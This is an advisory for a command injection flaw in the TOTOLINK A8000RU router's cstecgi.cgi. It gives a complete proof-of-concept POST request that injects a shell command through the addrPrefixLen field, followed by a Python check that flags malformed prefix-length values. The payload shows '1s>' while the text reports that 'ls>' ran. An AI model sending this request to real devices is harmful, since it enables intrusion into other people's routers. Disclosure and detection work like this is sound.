# A8000RU Command Injection Vulnerability Summary

## Vulnerability Overview

A command injection vulnerability was discovered in the `cstecgi.cgi` component of the TOTOLINK A8000RU router. Attackers can execute arbitrary operating system commands by crafting malicious requests that exploit the `addrPrefixlen` parameter.

## Affected Scope

- **Vendor**: TOTOLINK
- **Product**: A8000RU
- **Version**: 7.1cu643.b20200521

## Remediation

No specific remediation is currently provided on the vendor's page. It is recommended to contact the vendor to obtain a patch or update the firmware.

## Vulnerability Description

The vulnerability exists within `cstecgi.cgi`. An attacker can inject malicious values into the `addrPrefixlen` parameter of a crafted request. This value is passed to the `Uci_Set_Str` function and ultimately executed as a system command via `execv`.

## Proof of Concept (PoC)

The following is an example of an HTTP request exploiting this vulnerability:

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 97
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Referer: http://192.168.0.1/basic/index.html
Accept-Encoding: gzip, deflate, br
Cookie: SESSION_ID=1774573f3212
Connection: Keep-alive

{"topicUrl":"setIpv6LanCfg.txt","enableDhcpv6":"1","addrPrefixLen":"1s>./setipv6LanCfg.txt"}
```

## Result

After submitting the above HTTP request, it was observed that a `.txt` file was successfully created, containing a list of filenames from the directory. This confirms that the command `ls>./setipv6LanCfg.txt` was executed successfully.
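
Because no vendor fix is listed, requests to `cstecgi.cgi` can be checked at a reverse proxy or in captured traffic. The following is an added example, not part of the original advisory or of TOTOLINK's code: it flags any body whose prefix-length field is not a plain integer in the IPv6 range 0..128. The function name `check_body` and the benign sample are assumptions made for illustration.

```python
import json
import re

# An IPv6 prefix length is a decimal integer from 0 to 128; anything else is suspect.
_PREFIX_RE = re.compile(r"[0-9]{1,3}")
# Compared case-insensitively: the advisory spells the field both
# `addrPrefixlen` (prose) and `addrPrefixLen` (request body).
_FIELD = "addrprefixlen"

# Body copied from the advisory's PoC request.
PAGE_BODY = ('{"topicUrl":"setIpv6LanCfg.txt","enableDhcpv6":"1",'
             '"addrPrefixLen":"1s>./setipv6LanCfg.txt"}')
# Constructed benign sample (assumption): same request with a normal /64 prefix.
BENIGN_BODY = ('{"topicUrl":"setIpv6LanCfg.txt","enableDhcpv6":"1",'
               '"addrPrefixLen":"64"}')


def check_body(body):
    """Return a list of findings for one POST body sent to cstecgi.cgi."""
    try:
        doc = json.loads(body)
    except ValueError:
        return ["body is not valid JSON"]
    if not isinstance(doc, dict):
        return ["body is not a JSON object"]
    findings = []
    for key, value in doc.items():
        if key.lower() != _FIELD:
            continue
        # Normalise non-string JSON values (numbers, booleans, objects) to text
        # so that 64 passes while 64.0, true or a nested object is flagged.
        text = value if isinstance(value, str) else json.dumps(value)
        if not _PREFIX_RE.fullmatch(text) or int(text) > 128:
            findings.append(f"{key}={text!r} is not an integer in 0..128")
    return findings


if __name__ == "__main__":
    for name, body in (("advisory PoC", PAGE_BODY), ("benign", BENIGN_BODY)):
        print(name, "->", check_body(body) or "ok")
```

The check is an allow-list on the value's shape rather than a search for shell metacharacters, so it does not depend on knowing which characters the firmware's command construction mishandles.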